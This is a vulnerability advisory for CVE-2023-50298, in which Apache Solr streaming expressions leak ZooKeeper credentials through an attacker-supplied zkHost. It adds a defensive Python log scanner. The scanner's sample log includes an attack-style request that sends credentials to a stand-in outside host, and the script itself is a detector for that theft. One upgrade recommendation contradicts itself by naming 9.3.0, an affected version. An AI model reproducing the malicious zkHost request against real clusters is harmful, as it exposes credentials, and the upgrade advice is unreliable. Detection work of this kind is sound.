PT-2024-2359 · Apache · Apache Solr

Qing Xu · Published 2024-02-09 · Updated 2024-08-19 · CVE-2023-50298

CVSS v2.0: 7.8 (High)

Vector: AV:N/AC:L/Au:N/C:C/I:N/A:N
Name of the Vulnerable Software and Affected Versions

Apache Solr versions 6.0.0 through 8.11.2
Apache Solr versions 9.0.0 through 9.3.0
Apache Solr versions 9.0.0 before 9.4.1

Description

The issue is related to the exposure of sensitive information to an unauthorized actor in Apache Solr. Solr Streaming Expressions allows users to extract data from other Solr Clouds using a zkHost parameter. When the original SolrCloud is set up to use ZooKeeper credentials and ACLs, they will be sent to whatever zkHost the user provides. An attacker could set up a server to mock ZooKeeper, accepting ZooKeeper requests with credentials and ACLs, and extract sensitive information. Then, they could send a streaming expression using the mock server's address in zkHost. Streaming Expressions are exposed via the "/streaming" handler with "read" permissions.

Recommendations

For Apache Solr versions 6.0.0 through 8.11.2, upgrade to version 8.11.3. For Apache Solr versions 9.0.0 through 9.3.0, upgrade to version 9.3.0. For Apache Solr versions 9.0.0 before 9.4.1, upgrade to version 9.4.1. As a temporary workaround, consider restricting access to the /streaming handler to minimize the risk of exploitation. Avoid using the zkHost parameter in the affected API endpoint until the issue is resolved.
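Until the upgrade is applied, a defender can at least confirm whether anyone is already passing a zkHost value that points outside the cluster's own ZooKeeper ensemble. The script below is an added example written for this entry, not part of the advisory or the Solr project: it parses Solr request-log lines, picks out requests to the streaming handler (matched under both the "/streaming" name used above and the "/stream" spelling, so the check does not hinge on the exact handler path in a given deployment), extracts every zkHost value from the streaming expression, and reports hosts that are not on an allowlist of trusted ZooKeeper nodes. The four log lines, the hostnames and the allowlist are constructed for the example.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample Solr request-log lines (not taken from the advisory).
# Shape follows Solr's "o.a.s.c.S.Request" entries; values are made up.
SAMPLE_LOG = """\
2024-02-09 10:00:01.000 INFO  (qtp1-20) [c:books s:shard1 r:core_node2 x:books_shard1_replica_n1] o.a.s.c.S.Request [books_shard1_replica_n1]  webapp=/solr path=/select params={q=*:*&wt=json} status=0 QTime=3
2024-02-09 10:00:02.000 INFO  (qtp1-21) [c:books s:shard1 r:core_node2 x:books_shard1_replica_n1] o.a.s.c.S.Request [books_shard1_replica_n1]  webapp=/solr path=/stream params={expr=search(books,q%3D"*:*",fl%3D"id",sort%3D"id+asc")&wt=json} status=0 QTime=12
2024-02-09 10:00:03.000 INFO  (qtp1-22) [c:books s:shard1 r:core_node2 x:books_shard1_replica_n1] o.a.s.c.S.Request [books_shard1_replica_n1]  webapp=/solr path=/stream params={expr=search(books,zkHost%3D"zk1.internal:2181,zk2.internal:2181/solr",q%3D"*:*",fl%3D"id",sort%3D"id+asc")&wt=json} status=0 QTime=15
2024-02-09 10:00:04.000 INFO  (qtp1-23) [c:books s:shard1 r:core_node2 x:books_shard1_replica_n1] o.a.s.c.S.Request [books_shard1_replica_n1]  webapp=/solr path=/stream params={expr=search(books,zkHost%3D"203.0.113.10:2181",q%3D"*:*",fl%3D"id",sort%3D"id+asc")&wt=json} status=0 QTime=40
"""

# Handler paths to inspect: the advisory names "/streaming"; "/stream" is
# included so the check also matches deployments that register it that way.
STREAMING_PATHS = {"/streaming", "/stream"}

# Request line: we only need the handler path and the logged params block.
LOG_RE = re.compile(r"path=(?P<path>\S+) params=\{(?P<params>.*)\} status=")

# zkHost inside a streaming expression, quoted ("a:2181,b:2181/chroot")
# or unquoted (an unquoted value is read up to the next comma or paren).
ZKHOST_RE = re.compile(r'zkHost\s*=\s*(?:"([^"]*)"|([^,)\s]+))')


def parse_request(line):
    """Return (handler_path, params_dict) for a Solr request-log line, else None."""
    m = LOG_RE.search(line)
    if not m:
        return None
    # Solr URL-encodes param values in the log; parse_qsl decodes %3D, +, etc.
    params = dict(parse_qsl(m.group("params"), keep_blank_values=True))
    return m.group("path"), params


def zk_hosts_in_expr(expr):
    """Extract bare ZooKeeper hostnames/IPs from every zkHost in an expression."""
    hosts = []
    for m in ZKHOST_RE.finditer(expr):
        raw = m.group(1) if m.group(1) is not None else m.group(2)
        for entry in raw.split(","):
            entry = entry.strip().split("/", 1)[0]      # drop a chroot suffix
            host = entry.rsplit(":", 1)[0] if ":" in entry else entry  # drop port
            if host:
                hosts.append(host)
    return hosts


def find_untrusted_zkhost(log_text, trusted_zk_hosts):
    """Return [(line_no, host), ...] for streaming requests whose zkHost
    names a ZooKeeper node outside the trusted allowlist."""
    trusted = {h.lower() for h in trusted_zk_hosts}
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        parsed = parse_request(line)
        if parsed is None:
            continue
        path, params = parsed
        if path not in STREAMING_PATHS:
            continue
        for host in zk_hosts_in_expr(params.get("expr", "")):
            if host.lower() not in trusted:
                findings.append((line_no, host))
    return findings


if __name__ == "__main__":
    # Allowlist = the cluster's own ensemble (constructed names).
    for line_no, host in find_untrusted_zkhost(SAMPLE_LOG, ["zk1.internal", "zk2.internal"]):
        print(f"line {line_no}: streaming expression sends ZK credentials to untrusted host {host}")
```

Run against a real request log, the allowlist should be the exact connect-string hosts the SolrCloud was started with; any other host in a streaming expression is a request that, on an unpatched version, would have carried the cluster's ZooKeeper credentials and ACLs to that address.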

Fix

Weakness Enumeration

Insecure Storage of Sensitive Information
Information Disclosure
Incorrect Permission

Related Identifiers

BDU:2024-02307
BDU:2024-02308
BIT-SOLR-2023-50292
BIT-SOLR-2023-50298
CVE-2023-50298
GHSA-4WXW-42WX-2WFX
GHSA-XRJ7-X7GP-WWQR

Affected Products

Apache Solr